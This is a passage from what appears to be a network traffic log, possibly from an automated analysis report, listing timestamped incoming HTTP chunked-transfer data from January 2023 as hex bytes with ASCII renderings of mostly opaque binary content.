00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-01-03 08:46:54 UTC	80	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-03 08:46:54 UTC	80	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	80	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-01-03 08:46:54 UTC	88	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-01-03 08:46:54 UTC	88	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	88	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-01-03 08:46:54 UTC	96	IN	Data Raw: 4e 1d e1 3c b4 76 Data Ascii: N<v
2023-01-03 08:46:54 UTC	96	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	96	IN	Data Raw: 32 30 30 30 0d 0a f9 ea 23 58 cd ab ed 41 6c 24 7f 94 58 94 11 ca fd a7 dc 52 20 ee 6a 1b 72 de 1b 9f 58 b3 d7 8f b2 43 9b a0 04 8f f3 48 db a1 2f b6 ec 02 ed b0 4b 04 7d 40 e7 11 df 8f b6 f6 5c 0c 59 7b 00 c2 48 3a 25 e0 c4 b2 e7 bb e3 97 9b df d1 81 ad ee 3c 9f d2 0f 98 8d f5 93 f1 96 e7 dd fc e2 2b 39 3a 1f 4d 84 2e b9 0d bb 17 96 01 f3 77 24 6f 6e 42 28 c7 1d 82 48 02 eb 74 81 63 e1 28 85 25 56 1c 49 96 e6 4b db 5e f6 56 d1 08 41 93 91 34 33 28 77 94 39 28 68 fd c1 87 44 cb fe d4 2b d2 19 31 1a 31 af c4 e5 d1 a4 fb a6 50 10 8b 4d 7f 64 e6 19 6c fc bd fc 0a ac 29 bd 34 0a c0 49 15 cc 8c 0c 12 23 a5 3f bc d8 74 6f bc c5 0c 3a c5 0b 43 7b d4 53 25 31 95 f5 2b 3b e2 ae 13 b3 60 bd fb 66 b0 8f 1b 1a 62 92 f0 e2 64 41 51 b3 f6 14 6d 25 e9 49 73 40 b7 fa 51 Data Ascii: 2000#XAl$XR jrXCH/K}@\Y{H:%<+9:M.w$onB(Htc(%VIK^VA43(w9(hD+11PMdl)4I#?to:C{S%1+;`fbdAQm%Is@Q
2023-01-03 08:46:54 UTC	104	IN	Data Raw: 16 70 26 fb cf 0e Data Ascii: p&
2023-01-03 08:46:54 UTC	104	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	104	IN	Data Raw: 32 30 30 30 0d 0a f5 31 67 7a 90 c1 eb 3e 6c a4 50 c7 5a 92 4a 96 3f 4e f5 50 0f 97 22 ed cb 55 6f c4 d0 d3 18 75 cb 72 7f 2a 25 dd ae 64 86 fc b7 f8 18 cf 59 0a df c4 b1 42 c2 8c f7 55 af f3 a7 68 26 19 7a 26 d6 61 b0 0f 00 e6 a5 58 56 56 96 f8 14 b6 bb d2 90 8e ec ae 98 a4 81 28 e5 63 ab 4e 69 3d 3b 70 70 6c a1 c5 a4 ed 6b 48 e0 13 77 98 26 d0 87 67 74 86 61 58 9d 2e ba 83 75 29 34 9e 01 37 c1 42 cc 32 84 8b ac 00 35 9f 80 cc 06 e8 bd e8 6f 4d 7c 16 0a 68 3d d8 de 72 2b 1d c6 3c c1 cd 7c a6 21 5c 82 b8 99 20 7c c3 11 3d f4 08 fe d5 19 4e 30 46 64 cb 34 fe a2 4d 60 8f c7 6c d3 3e 4f 60 ff 1a 1c f3 53 37 32 fc 36 90 e5 6f c3 29 5c 09 84 74 b3 7d f6 c4 0a 7a 6e d3 39 48 a2 6d 06 55 76 a4 42 19 7b 7a c3 e0 dc b5 63 45 7e b4 f6 22 aa aa ff d5 cb d8 59 d7 b1 Data Ascii: 20001gz>lPZJ?NP"Uour*%dYBUh&z&aXVV(cNi=;pplkHw&gtaX.u)47B25oM\|h=r+<\|!\ \|=N0Fd4M`l>O`S726o)\t}zn9HmUvB{zcE~"Y
2023-01-03 08:46:54 UTC	112	IN	Data Raw: ae 7a 02 d7 72 d0 Data Ascii: zr
2023-01-03 08:46:54 UTC	112	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	112	IN	Data Raw: 32 30 30 30 0d 0a ec 04 ac 9f 48 27 b9 1a 0e ae 9d 04 6f 4d 1d 8e d4 81 67 0e b1 4d 88 b2 59 46 8c 1d d0 67 8e 40 cc f1 53 62 9a 0a 3a 8d cf da f2 2a ca e4 63 9a c3 0d 2d 62 72 b4 d0 42 6f 3c 3c 32 b1 eb 94 d8 0d 80 8d 41 c9 8a b2 64 bf 24 68 c8 55 60 59 c7 4a f9 bf e0 38 6b 5a 5f 49 92 53 ff 97 98 82 88 91 7e f2 87 57 16 fb 0c 3c 6c 8d da 9b fc 73 55 eb 2a 95 57 99 88 76 71 a3 c3 c9 2a 27 c4 fe a2 15 dc 88 57 c0 01 36 56 02 78 69 9f 6a 13 18 e1 81 71 cf 76 7e 8e 31 9a db da 95 eb c1 b9 0c 34 85 bb c7 0c aa 00 aa c1 a4 c0 08 00 fb e3 60 12 df a0 0a 9e da 44 7e 1b ff 8c 61 24 2b e2 97 cd 80 cc f6 e4 04 29 a6 10 93 8d e4 21 28 15 1b 8d 0a e9 20 d7 63 df 2e 52 df ef 5e 75 de 74 e5 a8 b8 93 a0 4b b9 1a 48 68 fa 17 f4 0c f6 27 28 9b 45 ef 3d 7e e3 56 f6 b6 e1 Data Ascii: 2000H'oMgMYFg@Sb:c-brBo<<2Ad$hU`YJ8kZ_IS~W<lsUWvq*'W6Vxijqv~14`D~a$+)!( c.R^utKHh'(E=~V
2023-01-03 08:46:54 UTC	120	IN	Data Raw: 1d 49 62 ab b2 e8 Data Ascii: Ib
2023-01-03 08:46:54 UTC	120	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	120	IN	Data Raw: 31 66 66 38 0d 0a 2e 10 52 f4 9b 7c bf 14 24 65 f1 7b 68 76 1a 93 c6 b4 0c 72 2e 91 ed 53 3b b9 02 64 de 28 22 7b cc 83 1b 70 f9 05 41 09 1e f9 f1 3f 8e a5 ee 8f 20 fa 98 30 81 34 50 cb f8 7f b3 3a b1 c7 e1 3c c0 01 0d a5 29 5b 7a d1 60 65 ea 06 1d 67 e4 4d 4d 75 ee 8d f5 26 9a fe 03 07 62 5e 0a 7d 93 c3 61 4c b8 a1 d0 fd 4d ed 2d ed 37 7e 67 bf 5f d7 12 6a fc 96 d4 ba 98 06 7a 47 46 2e 7c 64 63 84 9a f4 3f fe d4 b0 a5 38 29 59 f4 16 8a 54 d2 ad 97 9f f3 0c 0c c4 6f 1c aa b7 a3 26 b4 5f da 47 c4 ea 41 cc 77 d3 ec a4 90 e5 e4 07 89 37 e2 b2 50 8f 42 44 f4 f6 dd 0d c8 b2 ab 43 5d f2 a5 bc 1b 06 b3 77 1c 63 84 96 e6 7a b1 f1 fe 1f ba 9b 6a b5 a8 a5 b9 03 02 cc b4 2a 03 b2 5d d8 18 78 0e fc 37 92 9e d7 a7 01 72 e3 05 ed d2 3e 31 0f de 7d b0 d6 ca 74 e9 f0 17 Data Ascii: 1ff8.R\|$e{hvr.S;d("{pA? 04P:<)[z`egMMu&b^}aLM-7~g_jzGF.\|dc?8)YTo&_GAw7PBDC]wczj*]x7r>1}t
2023-01-03 08:46:54 UTC	128	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	128	IN	Data Raw: e1 b0 f4 0b d6 5d b1 81 80 08 62 ab 82 35 35 71 d1 09 74 0b 3b 2f 1b e7 f6 a5 ac e4 e1 6b 08 a9 8c 6a c7 78 10 e0 87 6a c7 eb 93 f8 92 50 2a 74 07 d1 76 d9 ba 8d 15 85 60 27 2c 18 06 8a 56 5a 6b 18 d8 af 75 c5 c8 a6 d6 95 be b6 e8 6d b6 9a fd 59 e7 d0 13 c9 37 40 9b 43 fc 79 e8 50 8e 76 2e 92 1d ff 10 85 91 d7 9d a7 4b a9 d6 eb dc 41 1c f2 e7 ff 32 0e e0 c7 2c b1 ba 20 1b 78 5e 8c 2c 05 00 5c bb 46 aa 46 76 76 d7 4a cc 0c 3b 24 7b 9a a7 10 1f d7 ab 36 db 57 9f 36 a3 79 8d 8f 7f 76 b1 0c 3b b4 dd 32 33 38 41 32 0f c7 4f c8 0f c7 13 2a ec e8 92 f7 62 b9 ae 9e ad 77 96 53 e8 cb 02 a0 43 e5 40 80 85 29 cd 1d a2 d7 84 c3 90 1c 14 9c 87 7a 96 b9 b2 d9 ab 8f e3 1f 68 5c af 16 be d7 eb a8 70 72 8f 9d 31 5f 80 c3 8b ed 3a c3 f3 6b 8a a0 2c b4 12 4c 44 2f 4e 2d d7 Data Ascii: ]b55qt;/kjxjPtv`',VZkumY7@CyPv.KA2, x^,\FFvvJ;${6W6yv;238A2ObwSC@)zh\pr1_:k,LD/N-
2023-01-03 08:46:54 UTC	136	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	136	IN	Data Raw: 32 30 30 30 0d 0a ca 36 17 61 9c f9 58 a0 ad d7 cf e3 42 26 cd e2 14 f0 66 8e 6e 57 c9 f5 41 01 83 86 2c 07 65 27 ad a0 fc 63 6d f7 33 c2 8f 35 2b cc 1a 71 7f 66 33 31 df 19 75 1e f2 99 a5 ae 9c 26 89 1d 81 06 c3 68 3b f2 13 00 00 e5 7f 05 ff 08 27 d3 97 63 99 1f fa 8f 2e 3c c5 b4 4c 69 d8 69 5b 2c e5 a4 0d 52 e8 d2 22 b6 c3 61 90 24 b4 57 83 8d c5 c8 94 dc be 7d 61 9c 39 5a 1a 0d df ba 27 b2 82 b3 4c 65 e0 dc 29 f0 6a 47 19 82 b5 2c a2 d8 bd 87 5a 00 8a 1f 71 cb 50 5b 1c e9 86 21 2c d6 7c a7 7f 4b 0f 7c 54 23 94 3f 1d ba aa 67 89 a0 d6 5a 40 15 46 50 05 df 2a 7d 04 39 26 1f 2f 0d 23 13 2a 64 56 4f 86 6e dc 33 20 a2 22 67 83 f0 3c 15 4f 4b 94 ba 07 dd 02 c7 b1 37 94 b9 4a 48 70 ad 12 e7 87 73 2b fa a4 9c 4d 7d 00 ad 46 a1 0b 10 a3 36 63 34 1b 48 88 b2 59 Data Ascii: 20006aXB&fnWA,e'cm35+qf31u&h;'c.<Lii[,R"a$W}a9Z'Le)jG,ZqP[!,\|K\|T#?gZ@FP}9&/#dVOn3 "g<OK7JHps+M}F6c4HY
2023-01-03 08:46:54 UTC	144	IN	Data Raw: 30 5d 1d de 1c 6c Data Ascii: 0]l
2023-01-03 08:46:54 UTC	144	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	144	IN	Data Raw: 32 30 30 30 0d 0a 7a 9d 35 79 68 20 15 50 25 69 fb e1 68 13 d5 0a bd e9 23 dd 1e 0e a3 5d 0f 59 a1 87 46 66 63 f6 c8 f0 75 aa a3 cc 79 8d 4f aa 8c 6a 8c 47 9f ff 45 05 ef 6b e4 84 a1 60 ce 9d 91 ad 3d e3 b7 f6 c7 ee ea b9 9e 6d e2 7d 31 3b d3 ba 2c 62 36 34 29 0a 71 84 1d 2a 0c 29 19 9f fc f4 ed 21 2c 9f 33 55 01 2e 88 8d 5a 9a bf 94 36 ce ef 44 43 2a 18 d7 70 31 74 9f 20 30 2c 59 75 2d d2 cf 62 ce ff 3b 1e 54 88 90 f4 f0 3a 1e 08 26 f4 07 91 61 a0 85 f9 0e fd 54 fb b0 16 ca 3f 88 55 c9 e8 3e a9 f9 5a 9b 4a 10 2d b1 1a 65 63 8a 1b 6e 7d 1a 7f 3b 9b 96 53 53 36 79 b9 10 a2 05 a3 71 39 3d 74 6c bf ef 50 c1 a1 78 11 05 2c dc d7 9a 47 bb 81 12 00 23 59 04 52 2e 40 bd 55 55 ea 9e 97 ed dc 5a 95 dc d4 01 48 b7 84 92 17 0e 71 94 ce 9a c0 dc 7c 69 9e 6e 1c 6f 9a Data Ascii: 2000z5yh P%ih#]YFfcuyOjGEk`=m}1;,b64)q)!,3U.Z6DCp1t 0,Yu-b;T:&aT?U>ZJ-ecn};SS6yq9=tlPx,G#YR.@UUZHq\|ino
2023-01-03 08:46:54 UTC	152	IN	Data Raw: f9 b5 19 c5 3e 7a Data Ascii: >z
2023-01-03 08:46:54 UTC	152	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	152	IN	Data Raw: 32 30 30 30 0d 0a 92 b8 a0 f9 61 5b 70 29 2a 3a 1c 85 0b 5f 7d 82 3b 01 c9 45 be 54 6b 24 28 fb 91 da ca 19 b0 fd 50 48 79 2e 08 ef 71 cc 63 c4 d5 fb 79 62 13 25 9a a3 19 be c1 c5 2c 9c b4 36 cb e7 ad 1d 3b 49 82 d4 cf 2b 9b f0 28 a2 d5 61 a7 67 ec d6 80 39 a3 f1 7d fb 50 31 3a e0 6c c7 09 6a 98 1e 83 21 33 70 89 e7 e3 5c d9 7a f1 91 23 af a6 39 9c 5e 1f 27 ac 97 2a 2f e0 75 57 85 71 f3 69 e4 42 24 97 9c 86 ca e0 dd 09 f3 a3 d5 a5 a4 af dd c0 cb 7d 57 8a 8c 40 5f 89 1b ed 3f 6b 64 ae 38 3e 3b 5d 5d 69 7a 53 a2 7b 44 09 ee 85 d7 38 5f 4c 58 6a 78 af c5 9b a9 8d dd 1a e9 4c 46 59 60 0c 30 b1 38 1a 4c 37 55 5d 56 8c 10 7e 78 1f ac a5 c3 db f9 01 9a 38 6e ae 02 69 ef 4f a9 39 3f bf 59 ce 64 55 f2 dd ea b8 a0 4e 95 15 1b 38 bf 0a ad ed ed c6 29 ae f4 58 62 34 Data Ascii: 2000a[p):_};ETk$(PHy.qcyb%,6;I+(ag9}P1:lj!3p\z#9^'/uWqiB$}W@_?kd8>;]]izS{D8_LXjxLFY`08L7U]V~x8niO9?YdUN8)Xb4
2023-01-03 08:46:54 UTC	160	IN	Data Raw: 3c ec 07 f9 07 56 Data Ascii: <V
2023-01-03 08:46:54 UTC	160	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	160	IN	Data Raw: 32 30 30 30 0d 0a 44 70 84 76 63 a5 e4 3f da 83 2e aa dc aa a0 0d f1 61 67 da c8 96 42 20 b4 d9 d3 85 29 4f a3 51 da 0e 8e 8f 58 91 26 a7 8e 1a c4 8d b7 8e 28 20 6d a7 dd 1a 48 b1 62 7c 30 c3 71 56 95 3b 4c ae 2e 28 fa c2 ad 49 29 00 2a 05 77 58 3b e7 4c 76 48 66 95 ab 8e 75 74 1a fe 3d 1e 45 05 8f 0b 11 7a ed dc 66 c0 b6 be 4f c8 05 c2 f6 55 03 5d 78 34 bb f1 e5 33 e2 db 47 b5 eb af 63 c0 36 9a d5 5c 5b d9 98 04 e1 38 42 d8 9e 69 25 53 c3 d6 b5 79 9d 84 f0 3b ef ec a9 e4 55 4c f7 ca 52 0e 79 36 87 f5 5c 22 ef 48 fa d6 1c a5 0b 17 be 64 e5 05 9c 33 90 8b ea fe c4 ca 91 bb 12 4d a7 b2 63 4f b7 6e 8b 76 cb ab a4 a6 fd c3 31 07 5e d9 35 d5 ef 80 8b ad bf a9 8c e3 b5 f1 ac 56 01 76 26 1e a1 41 f2 37 ae 47 59 6f 5b ea b4 b7 49 83 d9 9c f3 aa ac d7 4d 96 13 1d Data Ascii: 2000Dpvc?.agB )OQX&( mHb\|0qV;L.(I)*wX;LvHfut=EzfOU]x43Gc6\[8Bi%Sy;ULRy6\"Hd3McOnv1^5Vv&A7GYo[IM
2023-01-03 08:46:54 UTC	168	IN	Data Raw: a8 9a 1f 0b 73 db Data Ascii: s
2023-01-03 08:46:54 UTC	168	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	168	IN	Data Raw: 32 30 30 30 0d 0a fb 79 7d 75 3e 97 62 46 a0 ea 4d 2a 3f 06 d0 10 eb 1a 1c 16 88 e4 38 e5 66 6d 04 da 48 23 ef 4a fb 27 b2 17 1f d2 57 98 18 48 68 7b 4b 9d 06 76 dd b5 39 94 00 f3 5c d0 ed a3 21 72 6d 9d e0 db d6 a0 ba 70 f3 de 26 d4 bb 1a 0e 2f 72 8d 25 2f f9 a8 46 ba 7d 95 a6 f3 4b 1c fe a0 0d d3 1c 66 7f 64 0b 73 0c 04 b8 5b 7f 57 17 a1 a8 36 d2 1c 25 03 c9 57 85 b0 cc a3 df 28 a7 52 43 a5 89 7d 48 ee 25 e0 df 94 b6 ae cc cb cd 4e 44 52 ee 83 dc 79 19 36 45 fa 34 0b 86 7d 6b 84 1e 4d 9b 8f 16 36 60 74 5b ea c7 21 b8 34 d5 bb c5 cf f2 ad 60 bb 68 1d 4a c8 82 55 90 fd a9 b1 50 25 73 d9 9b 20 19 84 00 e3 7d bb a5 4f d9 5a 81 b1 72 8c 7c 9e d8 89 73 96 20 58 c0 4a 68 b7 e6 e7 f6 34 d3 c5 53 fe 89 23 b4 4f 7a da 85 b5 44 f4 ed 9d 94 90 ac 0e fe 9f ef 6d ba Data Ascii: 2000y}u>bFM*?8fmH#J'WHh{Kv9\!rmp&/r%/F}Kfds[W6%W(RC}H%NDRy6E4}kM6`t[!4`hJUP%s }OZr\|s XJh4S#OzDm
2023-01-03 08:46:54 UTC	176	IN	Data Raw: 7d 5b 37 fe c5 bd Data Ascii: }[7
2023-01-03 08:46:54 UTC	176	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	176	IN	Data Raw: 32 30 30 30 0d 0a e7 8d 65 e1 ab 2b 01 0e 79 f8 49 36 41 8f f3 ee a7 59 fd bb 31 b9 ce fe 50 20 d2 73 34 21 66 32 46 13 0b bc 90 fa ce cf 4e c9 50 1c 15 29 27 fe be 87 16 85 36 fd d0 46 bb f9 d7 0c 4d e9 42 cb f9 d9 ed e0 2f c5 66 ca 83 75 64 78 42 61 9e a6 e6 08 87 1f 35 be 98 50 df 63 1d 09 a9 5d 5c a4 3c 69 21 ca 67 b7 9c 32 5a 42 d0 82 e2 c8 20 0f f0 02 3a f9 69 b4 c7 8a 31 b3 2c 24 fa 29 41 d0 c3 9c 10 61 86 8e 9e 2f 2b 60 59 51 cb e2 f1 b2 d0 3d 6c 89 dc 85 94 31 21 6f d4 7e fd f1 70 9b 1e 90 9c 3d 0f a8 31 5c 42 36 79 42 b6 f2 d9 54 a8 6d 04 94 b2 3b a5 3c 04 3c de 6c ba 70 3a b2 37 52 c8 81 0c b6 48 69 a8 88 cd a4 dd 8f 0b 31 b0 c1 0a 17 42 77 5f ae a2 29 83 15 1a 28 07 a3 68 4a b9 2c 62 5d bf cf e8 57 d0 d4 94 c3 13 34 3d 67 7a 20 ab 88 c9 26 dd Data Ascii: 2000e+yI6AY1P s4!f2FNP)'6FMB/fudxBa5Pc]\<i!g2ZB :i1,$)Aa/+`YQ=l1!o~p=1\B6yBTm;<<lp:7RHi1Bw_)(hJ,b]W4=gz &
2023-01-03 08:46:54 UTC	184	IN	Data Raw: 6a 72 57 e8 a9 10 Data Ascii: jrW
2023-01-03 08:46:54 UTC	184	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	184	IN	Data Raw: 31 66 66 38 0d 0a be e1 e5 2c 94 a6 52 be 84 b1 ec 68 c3 3e ea 8a 81 0f b1 e8 a4 80 e4 00 b0 dc d4 ef 86 2b 0c 7e 3e 85 dc 93 42 58 7c 95 ba e3 69 1c ea 73 0d 71 c2 9b a5 7b f7 a6 a1 1d c5 e6 b2 75 55 f1 75 36 ad 33 c1 3c 58 a5 d7 a7 3a 64 5f b7 f2 25 56 10 fe 2d 6e 7d 32 b9 93 7a 16 dd 90 8d 8c 10 e1 cb f8 c5 72 5e f5 6f 8c ad 63 ae 74 33 f9 51 eb 23 41 b4 a8 7b 79 fa 54 2d 8f 5b ea f2 98 69 db 79 7d 1a 07 28 db 8e f5 15 fd 30 9d 32 6e 46 65 5e 09 46 88 d8 cf dc d1 95 db 8a 5f 52 6e 10 24 48 c2 cf 97 f4 f4 f4 65 43 8a c0 45 f0 2a 6b 54 5e ec e3 12 6e 34 78 83 b7 d3 b8 c7 ca 01 f4 d0 89 57 fb b8 f5 7a aa d5 40 d5 ba d3 16 81 5d 0c 60 4d 7d 90 5e d3 49 fc 6b 00 b4 0b 7d 45 45 df 7c c3 cd 6a eb 27 47 05 56 9a 35 0f aa d9 47 fb 50 a9 60 b0 fb 8f 3d 49 2a 16 Data Ascii: 1ff8,Rh>+~>BX\|isq{uUu63<X:d_%V-n}2zr^oct3Q#A{yT-[iy}(02nFe^F_Rn$HeCEkT^n4xWz@]`M}^Ik}EE\|j'GV5GP`=I
2023-01-03 08:46:54 UTC	192	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	192	IN	Data Raw: 7d f7 c9 bc 4e 97 c4 9f 92 f2 ad 5b 34 77 59 31 1a 58 be 2f 40 5f a4 fe 4c bb f6 49 0e b4 8a 8d e2 f5 79 65 cb 6e 6d 7d 40 aa 4d 6a c8 9a dc 46 3c 4d 97 cf 55 94 08 4e 11 d7 cf d2 8a d0 15 27 05 2b 56 c0 9d 61 86 63 00 e7 23 aa 1c 9b bf b5 3d d8 72 d9 31 b5 b9 27 15 4d bf 84 f7 c5 4a 7b e8 ca c2 9e de e4 7d 90 ad 9b 3d 60 c3 61 43 31 00 17 15 be 34 30 a9 35 9d 1a 40 2d 78 41 3b dc 74 a1 af 86 ba 3f 56 ef 26 d3 b3 0d 3a 69 81 d3 d9 57 22 78 1e a8 66 43 36 77 c6 c6 ec 9f 8d a2 57 40 c1 e1 34 e0 dc e7 ff 4a 12 83 63 84 85 60 59 e4 53 ed f3 30 21 7b 26 ba 0c ca 15 e5 03 93 a8 93 db 82 a8 2b f8 82 77 13 4b 6a 22 18 3e f7 9e ce 98 40 f3 f5 fc 15 4d 4c 3e 0f f6 5f 81 91 81 2c 75 58 3d 42 d6 a9 16 1f 56 7d 45 b4 27 02 f2 7d 12 56 22 22 8d 8d 30 8a 86 a0 cf d5 b1 Data Ascii: }N[4wY1X/@_LIyenm}@MjF<MUN'+Vac#=r1'MJ{}=`aC1405@-xA;t?V&:iW"xfC6wW@4Jc`YS0!{&+wKj">@ML>_,uX=BV}E'}V""0
2023-01-03 08:46:54 UTC	200	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	200	IN	Data Raw: 32 30 30 30 0d 0a f4 87 92 8d a1 df 04 90 c7 72 9b ed eb 56 6f 10 e6 4e 20 34 ea ed 0c 2b c0 fc c6 ee 63 85 7a 0c ee fd 30 3e 8f 47 c7 63 41 59 25 59 6b e9 53 9b fe 05 91 25 97 85 cf 60 e1 35 80 69 c7 d5 c0 40 44 5c 06 82 8d f8 e9 4b 08 1d 23 bd 3e b6 be ac 67 13 cc 8d 54 2f bf c4 10 65 a9 56 12 12 32 71 d6 d8 e2 14 a6 66 da ba e7 60 cc a0 b8 5a e5 95 5d 64 1b 32 86 eb 14 a1 be 54 e4 f4 78 6a 6b 7e 70 d3 25 fb 89 6a 02 1a 3f 19 e4 9d 59 e0 81 d2 aa 6a f6 c4 bd 42 84 da 96 b2 f2 35 cb 9a 3b 6e d5 3b 20 0e 00 b1 c8 ad 83 ea cd 0b 9f 4b 41 20 1a 15 9a a6 36 32 51 2d 10 af 1a 06 6a 1f e3 af ff 38 52 02 ae 0b 1f 46 85 29 4f ff 7b ef cb 81 11 6f e0 b7 46 d0 f3 25 be b7 53 9f 6c 82 57 85 cb bd f3 23 49 48 06 5a bc e3 f4 7c 0c b4 53 5b ff 4c 21 56 19 a2 72 13 77 Data Ascii: 2000rVoN 4+cz0>GcAY%YkS%`5i@D\K#>gT/eV2qf`Z]d2Txjk~p%j?YjB5;n; KA 62Q-j8RF)O{oF%SlW#IHZ\|S[L!Vrw
2023-01-03 08:46:54 UTC	208	IN	Data Raw: 25 4a 26 8a 02 50 Data Ascii: %J&P
2023-01-03 08:46:54 UTC	208	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	208	IN	Data Raw: 32 30 30 30 0d 0a 02 67 9a ed 7b 96 26 57 6a d8 37 f4 57 f2 5c 40 ad dc 0e 27 1c bf 6b a4 0a 08 4e 05 fc d6 fe 5c 14 d4 a1 60 8d fb ea 52 46 ed 07 bc 45 4f bb fa 5e ff a3 4c 6b 72 33 aa 88 cf 34 94 1f e0 25 07 33 27 f5 40 e7 0a bb 80 c1 1b de 57 be 26 6d 07 94 62 79 ac 20 7c e6 f5 8e 20 93 97 34 fe f2 e2 2c 73 b7 24 0d cd f4 87 f1 5b 4c 4c 5a 8d 41 f9 55 bb 2c 43 d8 ac fa 92 51 5b f7 eb e2 8f f5 f1 80 31 01 a7 73 bc ba 8a 5d f6 41 0d 64 67 e3 dd 1b 66 83 9a ba 7d fe c0 16 67 5b 52 9b c2 05 00 1a 51 7b ed 2c 63 5d 5e d9 1a ec 86 ae 45 0a 26 10 bc 8a 4f 4d 1b 09 ab 33 75 88 6d 51 85 d5 e4 be 65 39 d6 93 3c 29 f8 51 91 a5 ac 62 b8 95 9f 03 59 6c 27 61 40 64 0f 31 bf 8b cd 0d c9 a1 f7 18 84 22 37 ee fe 2b f0 1d 92 7a c3 1e 22 5f e6 0f 8b 7d 82 0a fc 93 a0 63 Data Ascii: 2000g{&Wj7W\@'kN\`RFEO^Lkr34%3'@W&mby \| 4,s$[LLZAU,CQ[1s]Adgf}g[RQ{,c]^E&OM3umQe9<)QbYl'a@d1"7+z"_}c
2023-01-03 08:46:54 UTC	216	IN	Data Raw: d2 38 fc 6d bc 03 Data Ascii: 8m
2023-01-03 08:46:54 UTC	216	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	216	IN	Data Raw: 32 30 30 30 0d 0a f3 3a 49 04 22 18 8a 6d dc d0 da d5 08 77 58 94 75 7e af 8f 98 2b bf 9d e4 20 8c c3 5b b9 26 88 73 a1 1b b7 9e cb b2 83 89 43 f4 10 9d ca 48 d7 99 94 94 ed 0f 3a ac 59 df 83 98 da 4e e4 17 2c 15 f3 54 15 b1 48 b2 68 79 6f 35 0f 77 a7 7b 5d d8 3b f8 f7 1b 12 ac f0 09 48 bc 9e 62 a9 d5 bc 39 22 b1 7d 5d f5 76 b5 6d 44 bb c5 5c 59 7c 53 a8 5a 5d ae ff 49 f6 2b 48 29 d7 6b d6 07 36 1d 30 cc 1d 83 6b 02 38 64 1e 0b 3a f6 52 66 65 62 31 ff db 3f f3 1f a4 d9 cf 82 8d 71 2c 5a 41 dd 0f 7f f6 82 7b a9 6c a6 95 a6 07 91 0e 58 c0 f2 74 90 f8 f3 ac 45 36 0e ef 6b 4a e2 e2 c8 de 39 1c be 42 75 52 91 3a 8d 44 10 2d 82 c7 23 aa 21 ea d1 eb 9c 35 4f a3 04 13 2e bf 48 68 8d 61 fa eb ae aa cd 44 d3 4d 19 6d d1 95 21 94 8a 1d d5 d4 34 cb 19 1d 31 ab cd 39 Data Ascii: 2000:I"mwXu~+ [&sCH:YN,THhyo5w{];Hb9"}]vmD\Y\|SZ]I+H)k60k8d:Rfeb1?q,ZA{lXtE6kJ9BuR:D-#!5O.HhaDMm!419
2023-01-03 08:46:54 UTC	224	IN	Data Raw: 96 f9 e3 3c 9d 2a Data Ascii: <*
2023-01-03 08:46:54 UTC	224	IN	Data Raw: 0d 0a Data Ascii:
